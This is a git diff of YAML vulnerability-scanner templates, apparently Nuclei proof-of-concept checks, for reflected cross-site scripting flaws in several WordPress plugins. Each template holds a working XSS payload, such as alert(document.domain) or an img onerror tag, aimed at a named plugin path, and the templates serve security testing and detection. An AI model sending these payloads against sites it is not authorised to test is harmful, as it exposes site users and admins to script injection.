https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html tags: wordpress,xss requests: - raw: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074-- diff --git a/poc/xss/wp-adaptive-xss.yaml b/poc/xss/wp-adaptive-xss.yaml index f297df178f..0a6168d053 100644 --- a/poc/xss/wp-adaptive-xss.yaml +++ b/poc/xss/wp-adaptive-xss.yaml @@ -1,4 +1,5 @@ id: wp-adaptive-xss + info: name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting author: dhiyaneshDK @@ -8,10 +9,12 @@ info: - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0 - https://plugins.trac.wordpress.org/changeset/2655683 tags: wordpress,xss,wp-plugin,wp + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true" + matchers-condition: and matchers: - type: word @@ -19,10 +22,12 @@ requests: - '<img/src/onerror=alert(document.domain)>' - '<td>Image</td>' condition: and + - type: word part: header words: - 'text/html' + - type: status status: - 200 diff --git a/poc/xss/wp-church-admin-xss-11424.yaml b/poc/xss/wp-church-admin-xss-11424.yaml index 089b607075..6dfb09ebcb 100644 --- a/poc/xss/wp-church-admin-xss-11424.yaml +++ b/poc/xss/wp-church-admin-xss-11424.yaml @@ -1,29 +1,25 @@ id: wp-church-admin-xss - info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-code-snippets-xss.yaml b/poc/xss/wp-code-snippets-xss.yaml index d6d4c61340..b3552bcadb 100644 --- a/poc/xss/wp-code-snippets-xss.yaml +++ b/poc/xss/wp-code-snippets-xss.yaml @@ -1,11 +1,10 @@ id: wp-code-snippets-xss info: - name: Code Snippets Wordpress Plugin - Cross-Site Scripting + name: Code Snippets Wordpress Plugin - XSS author: dhiyaneshDK severity: medium description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link - reference: - - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ + reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ tags: wordpress,xss,wp-plugin,authenticated requests: - raw: @@ -27,9 +26,6 @@ requests: part: body words: - '</script><script>alert(document.domain)</script>' - - 'toplevel_page_snippets' - - 'Search results in tag' - condition: and - type: word part: header words: diff --git a/poc/xss/wp-flagem-xss.yaml b/poc/xss/wp-flagem-xss.yaml index 98183da5f2..bc74462f47 100644 --- a/poc/xss/wp-flagem-xss.yaml +++ b/poc/xss/wp-flagem-xss.yaml @@ -1,30 +1,24 @@ id: wp-flagem-xss - info: name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://www.exploit-db.com/exploits/38674 + reference: https://www.exploit-db.com/exploits/38674 tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-nextgen-xss.yaml b/poc/xss/wp-nextgen-xss.yaml index 26930307d2..b8c4c9254f 100644 --- a/poc/xss/wp-nextgen-xss.yaml +++ b/poc/xss/wp-nextgen-xss.yaml @@ -1,30 +1,24 @@ id: wp-nextgen-xss - info: name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info + reference: https://www.securityfocus.com/bid/57200/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-phpfreechat-xss.yaml b/poc/xss/wp-phpfreechat-xss.yaml index f2e72f6d70..ef3aa1dea3 100644 --- a/poc/xss/wp-phpfreechat-xss.yaml +++ b/poc/xss/wp-phpfreechat-xss.yaml @@ -1,5 +1,4 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,24 +6,20 @@ info: reference: - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-slideshow-xss.yaml b/poc/xss/wp-slideshow-xss.yaml index 49be6efa96..2b851c9f5b 100644 --- a/poc/xss/wp-slideshow-xss.yaml +++ b/poc/xss/wp-slideshow-xss.yaml @@ -1,5 +1,4 @@ id: wp-slideshow-xss - info: name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,7 +6,6 @@ info: reference: - https://www.exploit-db.com/exploits/37948 tags: wordpress,xss,wp-plugin - requests: - method: GET path: @@ -22,12 +20,10 @@ requests: words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/xss/wp-socialfit-xss-11582.yaml b/poc/xss/wp-socialfit-xss-11582.yaml index 56b6690c8f..61f70d16de 100644 --- a/poc/xss/wp-socialfit-xss-11582.yaml +++ b/poc/xss/wp-socialfit-xss-11582.yaml @@ -1,15 +1,13 @@ id: wp-socialfit-xss - info: name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting author: daffainfo severity: medium description: | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: + reference: | - https://www.exploit-db.com/exploits/37481 tags: wordpress,xss,wp-plugin - requests: - method: GET path: diff --git a/poc/xss/xss-fuzz-11701.yaml b/poc/xss/xss-fuzz-11701.yaml index 3bed54cfe7..d4410a5f77 100644 --- a/poc/xss/xss-fuzz-11701.yaml +++ b/poc/xss/xss-fuzz-11701.yaml @@ -1,6 +1,5 @@ # id contains the unique identifier for the template. id: esetal-xss-fuzz - info: # Name is the name of the template name: Top 15 XSS Check @@ -10,7 +9,6 @@ info: # Description optionally describes the template. description: Searches for reflected XSS in the server response via GET-requests (but 9x slower xd). tags: xss - requests: - method: GET path: @@ -30,12 +28,10 @@ requests: words: - "<svg/onload=confirm('testing-xss" part: body - - type: word words: - "text/html" part: header - - type: status status: - - 200 \ No newline at end of file + - 200
troy + serial server